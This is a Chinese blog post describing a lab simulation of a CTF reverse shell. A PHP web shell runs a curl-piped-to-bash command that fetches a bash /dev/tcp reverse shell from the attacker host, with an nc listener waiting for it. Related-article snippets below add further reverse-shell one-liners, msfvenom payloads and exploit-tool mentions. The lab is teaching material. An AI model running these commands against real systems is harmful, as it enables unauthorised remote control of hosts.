反弹shell

最新推荐文章于 2025-06-02 13:29:35 发布
最新推荐文章于 2025-06-02 13:29:35 发布
阅读量1.3k 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: 新手踩的坑
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44377940/article/details/105288401
本文详细介绍了如何在CTF竞赛中实现从受害者主机到攻击者主机的反弹Shell过程。通过在受害者网站部署shell.php文件和在攻击者网站放置con.txt文件,结合curl命令和bash执行,最终成功获取远程Shell。文章强调了端口监听和文件位置的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

嫌疑人:192.168.249.147
受害者:192.168.249.130

这次的主要目的是模拟CTF题目中反弹shell。

首先,我们在受害机网站准备一个shell.php文件,内容如下:<?phpshell_exec($_GET['a'])?>,用以命令执行。
再在嫌疑人网站根目录准备一个con.txt文件,内容如下:bash -i >& /dev/tcp/192.168.249.147/2333 0>&1

再利用嫌疑人的shell执行nc -lvp 2333(监听端口)

当我们访问受害者网站的shell.php,并传入?a=curl 192.168.249.147/con.txt |bash
此时,嫌疑人成功反弹了受害者的shell,效果如图:
在这里插入图片描述

这里有几点需要注意:

  1. 检查端口是否打开,当攻击机的反弹shell所用端口关闭时是无法成功反弹的
  2. 一定要先监听,如果不先监听,则会出现bash: connect: Connection refused的字样,则反弹失败。
  3. 攻击的txt文件一定要放在网站目录,其他目录不行,在这里我们用curl命令进行了攻击,实质是利用curl命令读取网站文件然后再利用bash命令执行,所以curl处的是txt所在的目录。
一行代码实现Android反向shell(Reverse shell
键盘的起始页
04-12 711
cd /data/data/你的私有目录 && mkfifo f && cat f | /system/bin/sh -i 2>&1 | nc PC_IP 4444 > f。你的私有目录 这个目录可以是你APK的目录,或者你权限读写执行的目录。通过反向shell,即使你无法启用 adb,你也可以拥有一个反向 shell 并通过你的 PC 控制手机。本文通过一行代码即可实现Android反向shell(Reverse shell)。网上关于android得反向shell 多是需要安装apk的,操作麻烦。
无需公网IP反弹shell
qq_74263993的博客
08-22 447
Windows10(关掉病毒实时查杀,尽量别开防火墙)5.上传木门到Windows10并运行拿到shell。kali机(网络畅通,具有ipv6地址)3.设置msfconsole,生成木马。2.查看自己的ipv6地址。1.启动kali提权。
为什么要反弹shell
m0_55306747的博客
05-28 555
我也不知道这个比喻恰不恰当: 首先是一个城池,我想要控制这个城,就要控制这个城的城主,我手里有控制当前城主的把柄(shell) 但是我要和城主建立起联系才可以控制他,城外有一座大墙(防火墙),会严格检查入城的人(流量审查),所以我不能入城,一旦入城,城里的人可能会发现异样,将城主换掉(打补丁) 不过好在我发现这个城有一个后门,我虽然进不去,但是我把信送进去了,我不去找他,我让城主来找我,我在信上写了我的地址(ip和端口),然后我在预定的位置等待城主的到来(端口监听) 因为城主是城主出城,当然那个大墙
反弹 Shell(Reverse Shell)原理与实战详解
最新发布
chaoqun3的博客
06-02 1439
反弹 Shell 是指被控主机主动向攻击者主机发起连接请求,建立一个 TCP 或 UDP 连接后,攻击者可以通过这个连接执行命令并获取输出结果,从而实现远程控制。Netcat 被称为“网络瑞士军刀”,是一款强大的网络调试和数据传输工具。它可以用于创建 TCP/UDP 连接、监听端口、发送文件等。在被控机器上启动一个交互式 shell;将其所有输出(stdout 和 stderr)发送给攻击者;将攻击者作为输入源(stdin),实现远程控制。核心要点描述反弹 Shell 的本质。
反弹shell原理与实现
ZL_1618的博客
03-08 1971
反弹shell(ReverseShell)是一种常用于网络攻击中的技术,其目的是让攻击者通过远程控制程序获取被攻击计算机的权限。反弹shell技术通常是通过在受害者计算机上运行一个程序(称为“后门”),将计算机的控制权传递给攻击者。攻击者可以使用该程序在远程计算机上执行命令并访问其文件系统、网络接口等资源。在反弹shell攻击中,攻击者通常首先在受害者计算机上安装一个后门程序,然后使用一个包含恶意代码的文件或链接来欺骗用户打开该文件或链接。
反弹Shell大全与原理
weixin_55652418的博客
01-02 1961
more反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
关于反弹shell的理解
weixin_42151709的博客
03-22 971
想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹。 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。 那么什么情况下正向连接不太好用了呢? 1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。它的ip会动态改变,你不能持续控...
网络安全基础入门反弹SHELL与正反向连接技术:防火墙绕过及文件下载命令详解
04-22
内容概要:本文档主要介绍了基础入门级别的反弹SHELL、不回显带外、正反向连接、防火墙出入站规则以及文件下载等技术。涵盖Web常规、Web其他、Web拓展、APP架构、小程序架构等方面的知识点。详细讲解了渗透命令如...
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和...反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,...
Apache-flink 未授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 未授权访问任意jar包上传反弹shell
一句话反弹shell
小晓晓晓林的博客
02-20 3099
Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o isshell Windows msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=121...
反弹shell学习
E1even的博客
07-24 647
简单讲一下反弹shell: 什么是shell? linux的终端就是shell,相当于windows下的cmd.exe 反弹shell的原理到底是什么: 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 这里有个地方初学者不是很好理解:目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 那么这句话的实质操作是什么呢? 本质就是目标机对攻击机发起了TCP请求,既然有了请求,那么必然有输入和输出。而我们
别再头疼反弹Shell失败了,这篇文章带你找到问题根源
vivlol918的博客
09-01 2128
例如,如果目标系统的防火墙只允许80端口(HTTP)和443端口(HTTPS)的流量通过,而你尝试使用其他端口进行反弹shell,那么连接将被阻止,导致失败。
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
反弹shell失败的几种原因
谢公子的博客
05-03 1万+
在实战中,我们经常会遇到各种各样奇怪的环境。 反弹shell失败的原因有很多: 反弹的命令不存在或当前用户无权限调用bash 禁止出站IP 禁止出站端口 禁止出站协议 反弹的命令不存在或当前用户无权限调用bash 由于这种情况下只局限于Linux,所以不考虑Windows 反弹shell的命令,尽管这么多命令可以反弹shell,但是最终都还是调用bash反弹,所以 #bas...
Neo4j-shell 报错Connection refused解决方案
supramolecular的博客
07-17 2879
Linux环境下 cd /usr/share/neo4j/bin ./neo4j-shell 报错如下: ERROR (-v for expanded information): Connection refused -host Domain name or IP of host to connect to (default: localhost) -port ...
另一种反弹shell的方式
公众号shadow sock7
07-01 827
先在自己机器上执行[~]$ nc -vl 192.168.170.1 1234即在192.168.170.1/24网段上坚挺1234端口。 然后在target的shell中执行[~/repos/CTF/BSides-CTF-2017]$ python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值